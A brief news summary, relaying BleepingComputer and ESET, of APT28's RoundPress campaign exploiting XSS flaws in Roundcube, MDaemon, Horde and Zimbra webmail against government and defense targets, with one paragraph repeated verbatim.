BleepingComputer reports that attacks leveraging vulnerabilities impacting webmail servers have been deployed by Russian state-sponsored threat operation APT28 against government organizations, defense firms, military units, and critical infrastructure entities across several countries, including Ukraine, Bulgaria, and Ecuador, as part of the RoundPress cyberespionage campaign.
APT28, also known as Fancy Bear or Sednit, distributed news or political event-referencing spear-phishing emails including a nefarious JavaScript-laced HTML that prompts the exploitation of cross-site scripting vulnerabilities impacting multiple webmail products, according to an analysis from ESET. Intrusions involving the abuse of the Roundcube stored XSS flaw, tracked as CVE-2020-35730, allowed APT28 to pilfer credentials and other information, while a zero-day XSS in MDaemon, tracked as CVE-2024-11182, enabled evasion of two-factor authentication and persistent access on top of credential compromise. Other security defects impacting Roundcube, Horde, and Zimbra webmail servers have also been harnessed by APT28 to inject malicious code that executes upon message viewing, said ESET researchers.
APT28, also known as Fancy Bear or Sednit, distributed news or political event-referencing spear-phishing emails including a nefarious JavaScript-laced HTML that prompts the exploitation of cross-site scripting vulnerabilities impacting multiple webmail products, according to an analysis from ESET. Intrusions involving the abuse of the Roundcube stored XSS flaw, tracked as CVE-2020-35730, allowed APT28 to pilfer credentials and other information, while a zero-day XSS in MDaemon, tracked as CVE-2024-11182, enabled evasion of two-factor authentication and persistent access on top of credential compromise. Other security defects impacting Roundcube, Horde, and Zimbra webmail servers have also been harnessed by APT28 to inject malicious code that executes upon message viewing, said ESET researchers.
